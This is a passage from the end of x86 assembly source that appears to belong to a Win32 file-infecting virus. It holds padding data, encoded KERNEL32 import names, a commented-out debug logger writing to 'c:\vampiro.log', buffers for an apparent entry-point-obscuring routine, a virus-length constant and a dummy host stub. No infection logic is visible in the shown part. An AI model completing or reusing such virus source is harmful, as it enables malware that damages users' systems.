db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,028h,030h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,038h,030h,000h,000h,030h,030h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,046h,030h,000h,000h,000h,000h,000h,000h,046h,030h,000h,000h
|
||
db 000h,000h,000h,000h,04Bh,045h,052h,04Eh,045h,04Ch,033h,032h,02Eh,064h
|
||
db 06Ch,06Ch,000h,000h,000h,000h,045h,078h,069h,074h,050h,072h,06Fh,063h
|
||
db 065h,073h,073h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
__1:
|
||
pop edx
|
||
push 2560
|
||
pop ecx
|
||
call write
|
||
call close
|
||
__2:
|
||
ret
|
||
|
||
|
||
COMMENT &
|
||
|
||
log db 'c:\vampiro.log',0
|
||
|
||
log_it:
|
||
pusha
|
||
push edx
|
||
lea edx, [ebp.log]
|
||
push 2
|
||
pop eax
|
||
call open
|
||
cmp eax, -1
|
||
jnz __1
|
||
push 0 edx
|
||
call [ebp._lcreat]
|
||
__1:xchg eax, ebx
|
||
call fsize
|
||
xchg eax, edx
|
||
call seek
|
||
mov edx, [esp]
|
||
mov esi, edx
|
||
sub ecx, ecx
|
||
__2:
|
||
lodsb
|
||
inc ecx
|
||
cmp al, 0
|
||
jnz __2
|
||
dec ecx
|
||
call write
|
||
push 0D0A0D0Ah
|
||
push 2
|
||
pop ecx
|
||
mov edx, esp
|
||
call write
|
||
pop eax
|
||
call close
|
||
pop edx
|
||
popa
|
||
ret
|
||
&
|
||
|
||
db '^^'
|
||
|
||
buff: db 25*1024+8000 dup (0)
|
||
db 1000h dup (0)
|
||
len_buff equ $-buff
|
||
buffer db 0F8h + (28h*8) dup (0)
|
||
word3C dd 0
|
||
size_UEP equ 4096
|
||
UEP db size_UEP dup (0)
|
||
forUEP dd 0
|
||
tbl db 2048 dup (0)
|
||
_vl equ ($-start)
|
||
|
||
.code
|
||
host32:
|
||
jmp $
|
||
real_start:
|
||
push 0
|
||
zcall ExitProcess
|
||
end host32
|